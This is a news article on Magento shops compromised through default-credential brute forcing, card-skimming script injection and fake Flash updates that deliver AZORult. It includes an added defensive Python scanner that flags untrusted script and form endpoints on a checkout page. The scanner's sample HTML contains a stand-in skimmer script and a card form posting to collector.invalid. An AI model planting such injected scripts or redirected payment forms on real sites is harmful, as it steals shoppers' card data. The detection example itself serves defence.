Crypto-Mining & Card-Stealing Malware Infecting Magento Sites

Over a thousand shops and websites using Magento have been infected with malware that steals credit card information and runs cryptocurrency mining software.

The administrative panel Magento currently boasts two versions: a free and open-source one, and an enterprise option that offers support and whose sole maintainer is Magento.

Over a thousand shops and e-commerce sites that run Magento have been targeted by cyber attacks, threat-assessment site Flashpoint states in its report. Flashpoint goes on to say that these attacks have gone “unabated”, and that interest in the platform on the Dark Web has been observable since 2016. Furthermore, the site’s analysts indicate that there may be even more websites at risk and that other Content Management Systems (CMS), such as OpenCart and Powerfront, are targeted as well. Flashpoint notes that the victims are primarily workers in the healthcare and education industries, and most of the targets’ IPs are clustered in Europe and the United States.

The Hackers’ Method

The hackers set up scripts that perform a series of brute-force attacks on the targeted sites. These brute-force attacks use common and default Magento credentials. As per Flashpoint’s report, these attacks are most successful when users do not change their passwords after first logging in to the platform.

Once the hackers have gained access to the CMS, they are able to add scripts of any nature they wish. In these cases, the code that the hackers injected into the program allows them access to pages that process payment information. POST requests coming from the servers that contain sensitive information are then redirected to the hacker.
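One way a shop operator can check a payment page for the kind of injected script or redirected form target described above is to list every script source, iframe source and form action on the page and compare the hosts against an allowlist. This is an added example, not code from Flashpoint or Magento; the hosts `shop.example`, `cdn.shop.example` and `collector.invalid`, the sample HTML and the function name `find_untrusted_endpoints` are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample of a checkout page. shop.example and cdn.shop.example are
# hypothetical first-party hosts; collector.invalid stands in for an injected endpoint.
SAMPLE_CHECKOUT = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/lib/validate.js"></script>
<script src="//collector.invalid/loader.js"></script>
</head><body>
<form id="payment" method="post" action="https://collector.invalid/gate.php">
<input name="cc_number"><input name="cc_cid">
</form>
</body></html>
"""

class _ResourceCollector(HTMLParser):
    """Collects every URL the page loads script from or submits a form to."""
    WATCHED = {("script", "src"), ("form", "action"), ("iframe", "src")}

    def __init__(self):
        super().__init__()
        self.found = []  # (tag, attribute, raw URL) in document order

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and (tag, name) in self.WATCHED:
                self.found.append((tag, name, value.strip()))

def find_untrusted_endpoints(html, page_url, allowed_hosts):
    """Return (tag, attr, absolute_url) for resources whose host is not allowlisted."""
    collector = _ResourceCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for tag, attr, raw in collector.found:
        absolute = urljoin(page_url, raw)  # resolves relative and //host forms
        host = (urlparse(absolute).hostname or "").lower()
        if host not in allowed:  # data: or javascript: URLs have no host and are flagged
            findings.append((tag, attr, absolute))
    return findings

if __name__ == "__main__":
    hits = find_untrusted_endpoints(
        SAMPLE_CHECKOUT, "https://shop.example/checkout/",
        {"shop.example", "cdn.shop.example"})
    for tag, attr, url in hits:
        print(f"unexpected {tag}[{attr}] -> {url}")
```

A static scan like this only sees endpoints written into the markup; inline scripts that build their destination at runtime need a separate review of the script bodies or a Content-Security-Policy report.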

Upon visiting an exposed site, the end user is offered a fake update to Adobe Flash Player. If the malicious link is clicked, the script then installs malware from the attacker’s repositories, which are often stored on websites like GitHub. One piece of malware that may be installed is the trojan AZORult, which not only mines and stores data, but also downloads a cryptocurrency miner for Rarog.

Unfortunately, hackers have successfully stayed under the radar since 2016 because they update their malware daily. This practice allows them to avoid detection software, which works from signature and behavior patterns.

Mitigating Measures

Flashpoint is working together with law enforcement to warn victims of the dangers they have been exposed to. Moreover, threat-assessment analysts suggest a series of steps to improve “password-hygiene” and to minimize the negative outcome of these attacks. They advise companies to set up requirements for complex passwords, while also strongly discouraging employees from reusing old passwords. Two-factor authentication, especially for sensitive databases and systems, has also been proposed.

While a patch to improve Magento’s security is highly desirable at this point, the developers have not yet released a statement about such plans.

